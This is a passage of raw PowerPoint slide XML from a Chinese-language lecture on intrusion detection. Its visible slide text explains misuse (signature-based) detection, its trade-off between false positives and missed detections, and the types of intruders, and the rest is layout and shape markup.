              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>      监控   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>特征提取  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>匹配  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>判定 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指标     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>误报低   漏报高</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Text Box 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FFCAD8-E6AD-4A1E-95CE-EE63E1FE58D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误用检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin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7E4FD787-13EB-45B8-A40A-1FADB14AAD82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、入侵者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49F29744-488E-41C2-ABFF-338A00A3277C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>入侵者可以是一个手工发出命令的人，也可是一个基于入侵脚本或程序的自动发布命令的计算机。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>入侵者一般可以分为两类：内部的（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>一般指系统中的合法用户但违规或者越权操作）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>和外部的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>（一般指系统中的非法用户）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>。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CC6A4191-F336-4BC8-A54D-98B26433B833}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误用检测模型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121859" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D80452B-F1AF-4994-ABF1-3B539601C53F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="7772400" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>如果入侵特征与正常的用户行能匹配，则系统会发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>误报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>；如果没有特征能与某种新的攻击行为匹配，则系统会发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏报</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>
              <a:t>特点：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>采用特征匹配，滥用模式能明显降低误报率，但漏报率随之增加。攻击特征的细微变化，会使得滥用检测无能为力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>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Rectangle 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B52C5C0-D07A-4E58-A3D8-B73D9371A19B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036638" y="212725"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Misuse Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="122883" name="Group 1027">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DBD0909-F2C9-483D-8238-7218AB23FEF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="1433513"/>
            <a:ext cx="6704013" cy="3317875"/>
            <a:chOff x="624" y="912"/>
            <a:chExt cx="4223" cy="2090"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122886" name="AutoShape 1028">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662DF9BB-2AD2-4162-9A0A-A9002AF1CE5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="624" y="1200"/>
              <a:ext cx="960" cy="1104"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 28750"/>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kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="00CC00"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122887" name="Text Box 1029">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E14EA1-ACFB-4636-AAA5-136F772CDEBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1536"/>
              <a:ext cx="96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latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Intrusion Patterns</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122888" name="Line 1030">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4717915-02BA-4473-9304-EAC10AFD5A80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2969" y="2470"/>
              <a:ext cx="524" cy="401"/>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9" name="Line 1031">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A394A4-2708-405F-9EB9-C4E749FF11B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3446" y="2562"/>
              <a:ext cx="125" cy="294"/>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90" name="Oval 1032">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15A3ECE-7EFD-4C18-AF11-420B4EFA6E55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2918" y="2808"/>
              <a:ext cx="529" cy="194"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF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891" name="Freeform 1033">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1BB7AE-DF64-4EDA-ADD5-6942D1DF07B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3493" y="2464"/>
              <a:ext cx="81" cy="100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 162"/>
                <a:gd name="T1" fmla="*/ 1 h 198"/>
                <a:gd name="T2" fmla="*/ 0 w 162"/>
                <a:gd name="T3" fmla="*/ 1 h 198"/>
                <a:gd name="T4" fmla="*/ 1 w 162"/>
                <a:gd name="T5" fmla="*/ 1 h 198"/>
                <a:gd name="T6" fmla="*/ 1 w 162"/>
                <a:gd name="T7" fmla="*/ 1 h 198"/>
                <a:gd name="T8" fmla="*/ 1 w 162"/>
                <a:gd name="T9" fmla="*/ 1 h 198"/>
                <a:gd name="T10" fmla="*/ 1 w 162"/>
                <a:gd name="T11" fmla="*/ 1 h 198"/>
                <a:gd name="T12" fmla="*/ 1 w 162"/>
                <a:gd name="T13" fmla="*/ 1 h 198"/>
                <a:gd name="T14" fmla="*/ 1 w 162"/>
                <a:gd name="T15" fmla="*/ 1 h 198"/>
                <a:gd name="T16" fmla="*/ 1 w 162"/>
                <a:gd name="T17" fmla="*/ 1 h 198"/>
                <a:gd name="T18" fmla="*/ 1 w 162"/>
                <a:gd name="T19" fmla="*/ 1 h 198"/>
                <a:gd name="T20" fmla="*/ 1 w 162"/>
                <a:gd name="T21" fmla="*/ 1 h 198"/>
                <a:gd name="T22" fmla="*/ 1 w 162"/>
                <a:gd name="T23" fmla="*/ 1 h 198"/>
                <a:gd name="T24" fmla="*/ 1 w 162"/>
                <a:gd name="T25" fmla="*/ 1 h 198"/>
                <a:gd name="T26" fmla="*/ 1 w 162"/>
                <a:gd name="T27" fmla="*/ 1 h 198"/>
                <a:gd name="T28" fmla="*/ 1 w 162"/>
                <a:gd name="T29" fmla="*/ 1 h 198"/>
                <a:gd name="T30" fmla="*/ 1 w 162"/>
                <a:gd name="T31" fmla="*/ 1 h 198"/>
                <a:gd name="T32" fmla="*/ 1 w 162"/>
                <a:gd name="T33" fmla="*/ 0 h 198"/>
                <a:gd name="T34" fmla="*/ 1 w 162"/>
                <a:gd name="T35" fmla="*/ 1 h 198"/>
                <a:gd name="T36" fmla="*/ 1 w 162"/>
                <a:gd name="T37" fmla="*/ 1 h 1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2"/>
                <a:gd name="T58" fmla="*/ 0 h 198"/>
                <a:gd name="T59" fmla="*/ 162 w 162"/>
                <a:gd name="T60" fmla="*/ 198 h 1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2" h="198">
                  <a:moveTo>
                    <a:pt x="1" y="7"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="12"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="7"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFC2"/>
            </a:solidFill>
            <a:ln w="11113">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="122892" name="Freeform 1034">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8335B6-5C3A-43C1-907A-21CC2C390EA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3504" y="2467"/>
              <a:ext cx="66" cy="85"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 134"/>
                <a:gd name="T1" fmla="*/ 1 h 169"/>
                <a:gd name="T2" fmla="*/ 0 w 134"/>
                <a:gd name="T3" fmla="*/ 1 h 169"/>
                <a:gd name="T4" fmla="*/ 0 w 134"/>
                <a:gd name="T5" fmla="*/ 1 h 169"/>
                <a:gd name="T6" fmla="*/ 0 w 134"/>
                <a:gd name="T7" fmla="*/ 1 h 169"/>
                <a:gd name="T8" fmla="*/ 0 w 134"/>
                <a:gd name="T9" fmla="*/ 1 h 169"/>
                <a:gd name="T10" fmla="*/ 0 w 134"/>
                <a:gd name="T11" fmla="*/ 1 h 169"/>
                <a:gd name="T12" fmla="*/ 0 w 134"/>
                <a:gd name="T13" fmla="*/ 1 h 169"/>
                <a:gd name="T14" fmla="*/ 0 w 134"/>
                <a:gd name="T15" fmla="*/ 1 h 169"/>
                <a:gd name="T16" fmla="*/ 0 w 134"/>
                <a:gd name="T17" fmla="*/ 1 h 169"/>
                <a:gd name="T18" fmla="*/ 0 w 134"/>
                <a:gd name="T19" fmla="*/ 1 h 169"/>
                <a:gd name="T20" fmla="*/ 0 w 134"/>
                <a:gd name="T21" fmla="*/ 0 h 169"/>
                <a:gd name="T22" fmla="*/ 0 w 134"/>
                <a:gd name="T23" fmla="*/ 1 h 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169"/>
                <a:gd name="T38" fmla="*/ 134 w 134"/>
                <a:gd name="T39" fmla="*/ 169 h 1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169">
                  <a:moveTo>
                    <a:pt x="0" y="6"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132" y="164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6"/>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893" name="Freeform 1035">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5691B6F2-3E5F-4F5C-82E7-0C35AA5CDC56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3509" y="2472"/>
              <a:ext cx="38" cy="49"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 75"/>
                <a:gd name="T1" fmla="*/ 0 h 98"/>
                <a:gd name="T2" fmla="*/ 1 w 75"/>
                <a:gd name="T3" fmla="*/ 1 h 98"/>
                <a:gd name="T4" fmla="*/ 1 w 75"/>
                <a:gd name="T5" fmla="*/ 1 h 98"/>
                <a:gd name="T6" fmla="*/ 1 w 75"/>
                <a:gd name="T7" fmla="*/ 1 h 98"/>
                <a:gd name="T8" fmla="*/ 1 w 75"/>
                <a:gd name="T9" fmla="*/ 1 h 98"/>
                <a:gd name="T10" fmla="*/ 1 w 75"/>
                <a:gd name="T11" fmla="*/ 1 h 98"/>
                <a:gd name="T12" fmla="*/ 0 w 75"/>
                <a:gd name="T13" fmla="*/ 0 h 98"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                <a:gd name="T17" fmla="*/ 0 60000 65536"/>
